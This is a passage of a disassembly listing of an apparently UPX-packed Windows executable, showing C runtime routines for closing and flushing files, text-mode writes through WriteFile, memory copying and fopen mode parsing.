loc_41DD26: ; CODE XREF: sub_41DCA6+7C�j
pop edi
pop esi
retn
sub_41DCA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DD29 proc near ; CODE XREF: sub_419E4E+20�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041DDA8 SIZE 0000001C BYTES
push 0Ch
push offset stru_425520
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, ds:dword_47C62C
jnb short loc_41DDA8
mov eax, ebx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41DDA8
push ebx
call sub_421F4C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41DD80
push ebx
call sub_41DCA6
pop ecx
mov [ebp+var_1C], eax
jmp short loc_41DD8F
; ---------------------------------------------------------------------------
loc_41DD80: ; CODE XREF: sub_41DD29+49�j
call sub_41E685
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_41DD8F: ; CODE XREF: sub_41DD29+55�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41DDA0
mov eax, [ebp+var_1C]
jmp short loc_41DDBE
sub_41DD29 endp
; =============== S U B R O U T I N E =======================================
sub_41DD9D proc near ; DATA XREF: UPX0:stru_425520�o
mov ebx, [ebp+8]
sub_41DD9D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41DDA0 proc near ; CODE XREF: sub_41DD29+6A�p
push ebx
call sub_421FEC
pop ecx
retn
sub_41DDA0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41DD29
loc_41DDA8: ; CODE XREF: sub_41DD29+15�j
; sub_41DD29+35�j
call sub_41E685
mov dword ptr [eax], 9
call sub_41E68E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41DDBE: ; CODE XREF: sub_41DD29+72�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41DD29
; =============== S U B R O U T I N E =======================================
sub_41DDC4 proc near ; CODE XREF: sub_419E4E+18�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41DDED
test al, 8
jz short loc_41DDED
push dword ptr [esi+8]
call sub_419DDD
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_41DDED: ; CODE XREF: sub_41DDC4+A�j
; sub_41DDC4+E�j
pop esi
retn
sub_41DDC4 endp
; =============== S U B R O U T I N E =======================================
sub_41DDEF proc near ; CODE XREF: sub_419E4E+10�p
; sub_419EEB+7D�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_41DE3E
test ax, 108h
jz short loc_41DE3E
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_41DE3D
push edi
push eax
push dword ptr [esi+10h]
call sub_41E126
add esp, 0Ch
cmp eax, edi
jnz short loc_41DE36
mov eax, [esi+0Ch]
test al, al
jns short loc_41DE3D
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_41DE3D
; ---------------------------------------------------------------------------
loc_41DE36: ; CODE XREF: sub_41DDEF+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_41DE3D: ; CODE XREF: sub_41DDEF+25�j
; sub_41DDEF+3D�j ...
pop edi
loc_41DE3E: ; CODE XREF: sub_41DDEF+13�j
; sub_41DDEF+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_41DDEF endp
; =============== S U B R O U T I N E =======================================
sub_41DE4C proc near ; CODE XREF: sub_41DE7A+67�p
; sub_41DE7A+82�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_41DDEF
test eax, eax
pop ecx
jz short loc_41DE61
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41DE61: ; CODE XREF: sub_41DE4C+E�j
test byte ptr [esi+0Dh], 40h
jz short loc_41DE76
push dword ptr [esi+10h]
call sub_42218A
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41DE76: ; CODE XREF: sub_41DE4C+19�j
xor eax, eax
pop esi
retn
sub_41DE4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DE7A proc near ; CODE XREF: sub_41DF4F+2�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041DF2B SIZE 0000001B BYTES
push 14h
push offset stru_425530
call __SEH_prolog
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_24], edi
push 1
call sub_41D0E7
pop ecx
mov [ebp+ms_exc.disabled], edi
xor esi, esi
loc_41DE9B: ; CODE XREF: sub_41DE7A+99�j
mov [ebp+var_20], esi
cmp esi, ds:dword_47D780
jge loc_41DF2B
mov eax, ds:dword_47C778
mov eax, [eax+esi*4]
cmp eax, edi
jz short loc_41DF12
test byte ptr [eax+0Ch], 83h
jz short loc_41DF12
push eax
push esi
call sub_41AB5D
pop ecx
pop ecx
xor edx, edx
inc edx
mov [ebp+ms_exc.disabled], edx
mov eax, ds:dword_47C778
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_41DF0A
cmp [ebp+arg_0], edx
jnz short loc_41DEF1
push eax
call sub_41DE4C
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_41DF0A
inc [ebp+var_1C]
jmp short loc_41DF0A
; ---------------------------------------------------------------------------
loc_41DEF1: ; CODE XREF: sub_41DE7A+64�j
cmp [ebp+arg_0], edi
jnz short loc_41DF0A
test cl, 2
jz short loc_41DF0A
push eax
call sub_41DE4C
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_41DF0A
or [ebp+var_24], eax
loc_41DF0A: ; CODE XREF: sub_41DE7A+5F�j
; sub_41DE7A+70�j ...
mov [ebp+ms_exc.disabled], edi
call sub_41DF1A
loc_41DF12: ; CODE XREF: sub_41DE7A+3A�j
; sub_41DE7A+40�j
inc esi
jmp short loc_41DE9B
sub_41DE7A endp
; =============== S U B R O U T I N E =======================================
sub_41DF15 proc near ; DATA XREF: UPX0:00425544�o
xor edi, edi
mov esi, [ebp-20h]
sub_41DF15 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41DF1A proc near ; CODE XREF: sub_41DE7A+93�p
mov eax, ds:dword_47C778
push dword ptr [eax+esi*4]
push esi
call sub_41ABAF
pop ecx
pop ecx
retn
sub_41DF1A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41DE7A
loc_41DF2B: ; CODE XREF: sub_41DE7A+2A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41DF46
cmp [ebp+arg_0], 1
mov eax, [ebp+var_1C]
jz short loc_41DF40
mov eax, [ebp+var_24]
loc_41DF40: ; CODE XREF: sub_41DE7A+C1�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41DE7A
; =============== S U B R O U T I N E =======================================
sub_41DF46 proc near ; CODE XREF: sub_41DE7A+B5�p
; DATA XREF: UPX0:stru_425530�o
push 1
call sub_41D032
pop ecx
retn
sub_41DF46 endp
; =============== S U B R O U T I N E =======================================
sub_41DF4F proc near ; CODE XREF: sub_41AB1A�p
push 1
call sub_41DE7A
pop ecx
retn
sub_41DF4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=3A0h
sub_41DF58 proc near ; CODE XREF: sub_41E126+52�p
; sub_422A31+94�p
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = byte ptr -408h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-3A0h]
sub esp, 420h
mov eax, dword_42A290
push edi
xor edi, edi
cmp [ebp+3A0h+arg_8], edi
mov [ebp+3A0h+var_4], eax
mov [ebp+3A0h+var_418], edi
mov [ebp+3A0h+var_41C], edi
jnz short loc_41DF89
xor eax, eax
jmp loc_41E112
; ---------------------------------------------------------------------------
loc_41DF89: ; CODE XREF: sub_41DF58+28�j
mov eax, [ebp+3A0h+arg_0]
push ebx
mov ebx, [ebp+3A0h+arg_0]
and eax, 1Fh
sar ebx, 5
push esi
lea esi, [eax+eax*8]
lea ebx, ds:47C640h[ebx*4]
mov eax, [ebx]
shl esi, 2
test byte ptr [eax+esi+4], 20h
jz short loc_41DFC5
push 2
push edi
push edi
push [ebp+3A0h+arg_0]
call sub_422246
add esp, 10h
loc_41DFC5: ; CODE XREF: sub_41DF58+59�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_41E0A0
cmp [ebp+3A0h+arg_8], edi
mov eax, [ebp+3A0h+arg_4]
mov [ebp+3A0h+var_414], eax
mov [ebp+3A0h+var_40C], edi
jbe loc_41E0DE
loc_41DFEB: ; CODE XREF: sub_41DF58+10D�j
mov ecx, [ebp+3A0h+var_414]
sub ecx, [ebp+3A0h+arg_4]
lea eax, [ebp+3A0h+var_408]
mov [ebp+3A0h+var_410], edi
loc_41DFFA: ; CODE XREF: sub_41DF58+CF�j
cmp ecx, [ebp+3A0h+arg_8]
jnb short loc_41E029
mov edx, [ebp+3A0h+var_414]
inc [ebp+3A0h+var_414]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_41E01A
inc [ebp+3A0h+var_41C]
mov byte ptr [eax], 0Dh
inc eax
inc [ebp+3A0h+var_410]
loc_41E01A: ; CODE XREF: sub_41DF58+B6�j
mov [eax], dl
inc eax
inc [ebp+3A0h+var_410]
cmp [ebp+3A0h+var_410], 400h
jl short loc_41DFFA
loc_41E029: ; CODE XREF: sub_41DF58+A8�j
mov edi, eax
lea eax, [ebp+3A0h+var_408]
sub edi, eax
push 0
lea eax, [ebp+3A0h+var_420]
push eax
push edi
lea eax, [ebp+3A0h+var_408]
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_4240A8 ; WriteFile
test eax, eax
jz short loc_41E069
mov eax, [ebp+3A0h+var_420]
add [ebp+3A0h+var_418], eax
cmp eax, edi
jl short loc_41E072
mov eax, [ebp+3A0h+var_414]
sub eax, [ebp+3A0h+arg_4]
xor edi, edi
cmp eax, [ebp+3A0h+arg_8]
jb short loc_41DFEB
jmp short loc_41E074
; ---------------------------------------------------------------------------
loc_41E069: ; CODE XREF: sub_41DF58+F0�j
call dword_42412C ; RtlGetLastWin32Error
mov [ebp+3A0h+var_40C], eax
loc_41E072: ; CODE XREF: sub_41DF58+FA�j
xor edi, edi
loc_41E074: ; CODE XREF: sub_41DF58+10F�j
; sub_41DF58+16E�j ...
mov eax, [ebp+3A0h+var_418]
cmp eax, edi
jnz loc_41E10D
cmp [ebp+3A0h+var_40C], edi
jz short loc_41E0DE
push 5
pop esi
cmp [ebp+3A0h+var_40C], esi
jnz short loc_41E0D3
call sub_41E685
mov dword ptr [eax], 9
call sub_41E68E
mov [eax], esi
jmp short loc_41E108
; ---------------------------------------------------------------------------
loc_41E0A0: ; CODE XREF: sub_41DF58+75�j
push edi
lea ecx, [ebp+3A0h+var_420]
push ecx
push [ebp+3A0h+arg_8]
push [ebp+3A0h+arg_4]
push dword ptr [eax]
call dword_4240A8 ; WriteFile
test eax, eax
jz short loc_41E0C8
mov eax, [ebp+3A0h+var_420]
mov [ebp+3A0h+var_40C], edi
mov [ebp+3A0h+var_418], eax
jmp short loc_41E074
; ---------------------------------------------------------------------------
loc_41E0C8: ; CODE XREF: sub_41DF58+163�j
call dword_42412C ; RtlGetLastWin32Error
mov [ebp+3A0h+var_40C], eax
jmp short loc_41E074
; ---------------------------------------------------------------------------
loc_41E0D3: ; CODE XREF: sub_41DF58+132�j
push [ebp+3A0h+var_40C]
call sub_41E697
pop ecx
jmp short loc_41E108
; ---------------------------------------------------------------------------
loc_41E0DE: ; CODE XREF: sub_41DF58+8D�j
; sub_41DF58+12A�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41E0F6
mov eax, [ebp+3A0h+arg_4]
cmp byte ptr [eax], 1Ah
jnz short loc_41E0F6
xor eax, eax
jmp short loc_41E110
; ---------------------------------------------------------------------------
loc_41E0F6: ; CODE XREF: sub_41DF58+18D�j
; sub_41DF58+198�j
call sub_41E685
mov dword ptr [eax], 1Ch
call sub_41E68E
mov [eax], edi
loc_41E108: ; CODE XREF: sub_41DF58+146�j
; sub_41DF58+184�j
or eax, 0FFFFFFFFh
jmp short loc_41E110
; ---------------------------------------------------------------------------
loc_41E10D: ; CODE XREF: sub_41DF58+121�j
sub eax, [ebp+3A0h+var_41C]
loc_41E110: ; CODE XREF: sub_41DF58+19C�j
; sub_41DF58+1B3�j
pop esi
pop ebx
loc_41E112: ; CODE XREF: sub_41DF58+2C�j
mov ecx, [ebp+3A0h+var_4]
pop edi
call sub_4192B6
add ebp, 3A0h
leave
retn
sub_41DF58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E126 proc near ; CODE XREF: sub_419EEB+9F�p
; sub_41C547+98�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041E1B5 SIZE 0000001C BYTES
push 0Ch
push offset stru_425548
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, ds:dword_47C62C
jnb short loc_41E1B5
mov eax, ebx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41E1B5
push ebx
call sub_421F4C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41E185
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41DF58
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_41E19C
; ---------------------------------------------------------------------------
loc_41E185: ; CODE XREF: sub_41E126+49�j
call sub_41E685
mov dword ptr [eax], 9
call sub_41E68E
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_41E19C: ; CODE XREF: sub_41E126+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41E1AD
mov eax, [ebp+var_1C]
jmp short loc_41E1CB
sub_41E126 endp
; =============== S U B R O U T I N E =======================================
sub_41E1AA proc near ; DATA XREF: UPX0:stru_425548�o
mov ebx, [ebp+8]
sub_41E1AA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E1AD proc near ; CODE XREF: sub_41E126+7A�p
push ebx
call sub_421FEC
pop ecx
retn
sub_41E1AD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41E126
loc_41E1B5: ; CODE XREF: sub_41E126+15�j
; sub_41E126+35�j
call sub_41E685
mov dword ptr [eax], 9
call sub_41E68E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41E1CB: ; CODE XREF: sub_41E126+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41E126
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E1E0 proc near ; CODE XREF: sub_419EEB+5F�p
; sub_41E82C+A8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41E200
cmp edi, eax
jb loc_41E37C
loc_41E200: ; CODE XREF: sub_41E1E0+16�j
test edi, 3
jnz short loc_41E21C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41E23C
rep movsd
jmp off_41E32C[edx*4]
; ---------------------------------------------------------------------------
loc_41E21C: ; CODE XREF: sub_41E1E0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41E234
and eax, 3
add ecx, eax
jmp dword ptr loc_41E23C+4[eax*4]
; ---------------------------------------------------------------------------
loc_41E234: ; CODE XREF: sub_41E1E0+46�j
jmp dword ptr loc_41E33C[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41E23C: ; CODE XREF: sub_41E1E0+31�j
; sub_41E1E0+8E�j ...
jmp off_41E2C0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41E250
dd offset loc_41E27C
dd offset loc_41E2A0
; ---------------------------------------------------------------------------
loc_41E250: ; DATA XREF: sub_41E1E0+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41E23C
rep movsd
jmp off_41E32C[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41E27C: ; DATA XREF: sub_41E1E0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41E23C
rep movsd
jmp off_41E32C[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41E2A0: ; DATA XREF: sub_41E1E0+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_41E23C
rep movsd
jmp off_41E32C[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_41E2C0 dd offset loc_41E323 ; DATA XREF: sub_41E1E0:loc_41E23C�r
dd offset loc_41E310
dd offset loc_41E308
dd offset loc_41E300
dd offset loc_41E2F8
dd offset loc_41E2F0
dd offset loc_41E2E8
dd offset loc_41E2E0
; ---------------------------------------------------------------------------
loc_41E2E0: ; CODE XREF: sub_41E1E0:loc_41E23C�j
; DATA XREF: sub_41E1E0+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41E2E8: ; CODE XREF: sub_41E1E0:loc_41E23C�j
; DATA XREF: sub_41E1E0+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41E2F0: ; CODE XREF: sub_41E1E0:loc_41E23C�j
; DATA XREF: sub_41E1E0+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41E2F8: ; CODE XREF: sub_41E1E0:loc_41E23C�j
; DATA XREF: sub_41E1E0+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41E300: ; CODE XREF: sub_41E1E0:loc_41E23C�j
; DATA XREF: sub_41E1E0+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41E308: ; CODE XREF: sub_41E1E0:loc_41E23C�j
; DATA XREF: sub_41E1E0+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41E310: ; CODE XREF: sub_41E1E0:loc_41E23C�j
; DATA XREF: sub_41E1E0+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41E323: ; CODE XREF: sub_41E1E0:loc_41E23C�j
; DATA XREF: sub_41E1E0:off_41E2C0�o
jmp off_41E32C[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41E32C dd offset loc_41E33C ; DATA XREF: sub_41E1E0+35�r
; sub_41E1E0+92�r ...
dd offset loc_41E344
dd offset loc_41E350
dd offset loc_41E364
; ---------------------------------------------------------------------------
loc_41E33C: ; CODE XREF: sub_41E1E0+35�j
; sub_41E1E0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41E344: ; CODE XREF: sub_41E1E0+35�j
; sub_41E1E0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41E350: ; CODE XREF: sub_41E1E0+35�j
; sub_41E1E0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41E364: ; CODE XREF: sub_41E1E0+35�j
; sub_41E1E0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41E37C: ; CODE XREF: sub_41E1E0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41E3B0
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41E3A4
std
rep movsd
cld
jmp off_41E4C8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41E3A4: ; CODE XREF: sub_41E1E0+1B5�j
; sub_41E1E0+210�j ...
neg ecx
jmp off_41E478[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41E3B0: ; CODE XREF: sub_41E1E0+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41E3C8
and eax, 3
sub ecx, eax
jmp dword ptr loc_41E3C8+4[eax*4]
; ---------------------------------------------------------------------------
loc_41E3C8: ; CODE XREF: sub_41E1E0+1DA�j
; DATA XREF: sub_41E1E0+1E1�r
jmp off_41E4C8[ecx*4]
; ---------------------------------------------------------------------------
align 10h
dd offset loc_41E3DB+1
dd offset loc_41E400
; ---------------------------------------------------------------------------
sub ah, ah
inc ecx
loc_41E3DB: ; DATA XREF: sub_41E1E0+1F0�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_41E3A4
std
rep movsd
cld
jmp off_41E4C8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41E400: ; DATA XREF: sub_41E1E0+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41E3A4
std
rep movsd
cld
jmp off_41E4C8[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41E3A4
std
rep movsd
cld
jmp off_41E4C8[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41E47C
dd offset loc_41E484
dd offset loc_41E48C
dd offset loc_41E494
dd offset loc_41E49C
dd offset loc_41E4A4
dd offset loc_41E4AC
off_41E478 dd offset loc_41E4BF ; DATA XREF: sub_41E1E0+1C6�r
; ---------------------------------------------------------------------------
loc_41E47C: ; DATA XREF: sub_41E1E0+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41E484: ; DATA XREF: sub_41E1E0+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_41E48C: ; DATA XREF: sub_41E1E0+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41E494: ; DATA XREF: sub_41E1E0+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_41E49C: ; DATA XREF: sub_41E1E0+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41E4A4: ; DATA XREF: sub_41E1E0+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_41E4AC: ; DATA XREF: sub_41E1E0+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41E4BF: ; CODE XREF: sub_41E1E0+1C6�j
; DATA XREF: sub_41E1E0:off_41E478�o
jmp off_41E4C8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41E4C8 dd offset loc_41E4D8 ; DATA XREF: sub_41E1E0+1BB�r
; sub_41E1E0:loc_41E3C8�r ...
dd offset loc_41E4E0
dd offset loc_41E4F0
dd offset loc_41E504
; ---------------------------------------------------------------------------
loc_41E4D8: ; CODE XREF: sub_41E1E0+1BB�j
; sub_41E1E0:loc_41E3C8�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41E4E0: ; CODE XREF: sub_41E1E0+1BB�j
; sub_41E1E0:loc_41E3C8�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41E4F0: ; CODE XREF: sub_41E1E0+1BB�j
; sub_41E1E0:loc_41E3C8�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41E504: ; CODE XREF: sub_41E1E0+1BB�j
; sub_41E1E0:loc_41E3C8�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41E1E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E51D proc near ; CODE XREF: sub_41A03E+35�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_44C28C
push edi
mov edi, [ebp+arg_4]
mov al, [edi]
xor ebx, ebx
cmp al, 61h
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jz short loc_41E556
cmp al, 72h
jz short loc_41E54F
cmp al, 77h
jnz loc_41E662
mov ecx, 301h
jmp short loc_41E55B
; ---------------------------------------------------------------------------
loc_41E54F: ; CODE XREF: sub_41E51D+21�j
xor ecx, ecx
or esi, 1
jmp short loc_41E55E
; ---------------------------------------------------------------------------
loc_41E556: ; CODE XREF: sub_41E51D+1D�j
mov ecx, 109h
loc_41E55B: ; CODE XREF: sub_41E51D+30�j
or esi, 2
loc_41E55E: ; CODE XREF: sub_41E51D+37�j
xor edx, edx
inc edx
jmp loc_41E63D
; ---------------------------------------------------------------------------
loc_41E566: ; CODE XREF: sub_41E51D+125�j
cmp edx, ebx
jz loc_41E648
movsx eax, al
cmp eax, 54h
jg short loc_41E5E7
jz short loc_41E5DA
sub eax, 2Bh
jz short loc_41E5C4
sub eax, 19h
jz short loc_41E5BA
sub eax, 0Eh
jz short loc_41E5A6
dec eax
jnz loc_41E61F
cmp [ebp+var_4], ebx
jnz loc_41E61F
mov [ebp+var_4], 1
or ecx, 20h
jmp loc_41E63D
; ---------------------------------------------------------------------------
loc_41E5A6: ; CODE XREF: sub_41E51D+68�j
cmp [ebp+var_4], ebx
jnz short loc_41E61F
mov [ebp+var_4], 1
or ecx, 10h
jmp loc_41E63D
; ---------------------------------------------------------------------------
loc_41E5BA: ; CODE XREF: sub_41E51D+63�j
test cl, 40h
jnz short loc_41E61F
or ecx, 40h
jmp short loc_41E63D
; ---------------------------------------------------------------------------
loc_41E5C4: ; CODE XREF: sub_41E51D+5E�j
test cl, 2
jnz short loc_41E61F
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_41E63D
; ---------------------------------------------------------------------------
loc_41E5DA: ; CODE XREF: sub_41E51D+59�j
mov eax, 1000h
test ecx, eax
jnz short loc_41E61F
or ecx, eax
jmp short loc_41E63D
; ---------------------------------------------------------------------------
loc_41E5E7: ; CODE XREF: sub_41E51D+57�j
sub eax, 62h
jz short loc_41E632
dec eax
jz short loc_41E61A
sub eax, 0Bh
jz short loc_41E606
sub eax, 6
jnz short loc_41E61F
test ch, 0C0h
jnz short loc_41E61F
or ecx, 4000h
jmp short loc_41E63D
; ---------------------------------------------------------------------------
loc_41E606: ; CODE XREF: sub_41E51D+D5�j
cmp [ebp+var_8], ebx
jnz short loc_41E61F
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp short loc_41E63D
; ---------------------------------------------------------------------------
loc_41E61A: ; CODE XREF: sub_41E51D+D0�j
cmp [ebp+var_8], ebx
jz short loc_41E623
loc_41E61F: ; CODE XREF: sub_41E51D+6B�j
; sub_41E51D+74�j ...
xor edx, edx
jmp short loc_41E63D
; ---------------------------------------------------------------------------
loc_41E623: ; CODE XREF: sub_41E51D+100�j
mov [ebp+var_8], 1
or esi, 4000h
jmp short loc_41E63D
